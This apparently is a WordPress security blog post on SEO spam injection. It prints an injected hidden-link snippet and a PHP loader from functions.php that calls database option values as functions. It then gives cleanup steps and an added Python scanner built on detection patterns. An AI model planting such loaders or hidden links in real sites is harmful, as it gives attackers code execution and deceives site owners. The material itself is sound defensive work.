For our WordPress site admins, we have a new malware injection for you to worry about. It's SEO injection malware, and it's interesting in how it's implemented. There are two different “flavors” of this darling injection:
- Injecting HTML code for concealed elements in theme files
- Injecting fake spam posts in the WordPress database
Both have the same result: a hacker loads a web page with spammy links, redirects, and ad keywords, all while the site owner has no idea it is even happening.
First, we should look at the concealed elements in theme files. Right off, if you're finding advertisements for sunglasses on your site where you didn't add advertisements, you have a problem. A quick search of your files using terms from the ad will reveal the code that's been inserted into the site.
<p> <a style="display: none; position: absolute; left: -10565px;" href="www.example.com/awesome-shades-by-greg">Awesome Shades by Greg</a></p>
As for the second type of injection, it’s even easier to find. Since it’s injecting itself into WordPress posts, just do a quick search using terms from the ad in your posts search bar. Bam, you will get immediate results showing which posts were infected and need the suspected code removed.
So, what is going on? You're going to find that the culprit is most likely an infected functions.php file which is loading content from the wp_options table of the database. For example, you may find:
$wp_template_css = get_option('themes_css' );
if ( isset( $wp_template_css['style'] ) )
@$wp_template_css['style']( null,$wp_template_css['fonts']($wp_template_css['html']) );
What is suspicious about this code is the wp_template_css call: values read from the themes_css option are invoked as functions. This is not the usual method for CSS to be loaded in a WordPress theme. Searching the database for this option reveals the suspect software that requires removal from the database.
If you're finding your site infected with this SEO spam, you can do a few things to get it cleaned:
- Search the functions.php file for any malicious code.
- The name may change depending on the version of the infection, but themes_css or a variation thereof should be removed.
- Check your database for any unknown type of prefixes. Something like backupdb_wp_ instead of just wp_. You'll want to look for backupdb_wp_posts and backupdb_wp_lstat tables. If you're using a different prefix than wp_, then of course the name will vary.
- Remove code, of course, that’s been added to your header, footer, and posts on your WordPress site.
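The checks in the list above can be scripted. The following Python script is an added example, not code from the original post: it scans a theme file's text for the hidden-link style and for an option value invoked as a function, and flags tables that carry an extra prefix. The function names and the sample data are constructed for illustration.

```python
import re

# Anchor hidden by inline CSS: display:none or a large negative left offset.
HIDDEN_LINK = re.compile(
    r"<a\b[^>]*\bstyle\s*=\s*[\"'][^\"']*"
    r"(?:display\s*:\s*none|left\s*:\s*-\d{3,}px)", re.I)
# A variable filled from get_option('name').
OPTION_ASSIGN = re.compile(
    r"(\$\w+)\s*=\s*get_option\s*\(\s*[\"']([^\"']+)[\"']")


def scan_theme_source(source):
    """Return (line_no, finding) tuples for the two patterns in the article."""
    findings, option_vars = [], {}
    for no, line in enumerate(source.splitlines(), 1):
        if HIDDEN_LINK.search(line):
            findings.append((no, "hidden-link"))
        m = OPTION_ASSIGN.search(line)
        if m:
            option_vars[m.group(1)] = m.group(2)
        # An element of an option-backed array used as a function: $var['k'](
        for var, opt in option_vars.items():
            if re.search(re.escape(var) + r"\s*\[[^\]]+\]\s*\(", line):
                findings.append((no, "option-call:" + opt))
    return findings


def odd_prefix_tables(tables, prefix="wp_"):
    """Tables that embed the site's prefix behind an extra, unknown one."""
    return [t for t in tables if prefix in t and not t.startswith(prefix)]


# Constructed sample input modelled on the snippets in the article.
SAMPLE_THEME = """<?php
$wp_template_css = get_option('themes_css' );
if ( isset( $wp_template_css['style'] ) )
@$wp_template_css['style']( null,$wp_template_css['fonts']($wp_template_css['html']) );
?>
<p><a style="display: none; position: absolute; left: -10565px;" href="www.example.com/awesome-shades-by-greg">Awesome Shades by Greg</a></p>
<a style="color: red" href="/about">About</a>
"""
SAMPLE_TABLES = ["wp_posts", "wp_options", "backupdb_wp_posts", "backupdb_wp_lstat"]

if __name__ == "__main__":
    for line_no, finding in scan_theme_source(SAMPLE_THEME):
        print(f"line {line_no}: {finding}")
    print("unexpected tables:", odd_prefix_tables(SAMPLE_TABLES))
```

A hit is a lead for manual review, not proof of infection: legitimate themes sometimes hide links with CSS, and the option name to remove is whatever the scan reports for your file.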
If you still find spam links on your site after taking the above actions, send us a ticket and we will take a look at the problem!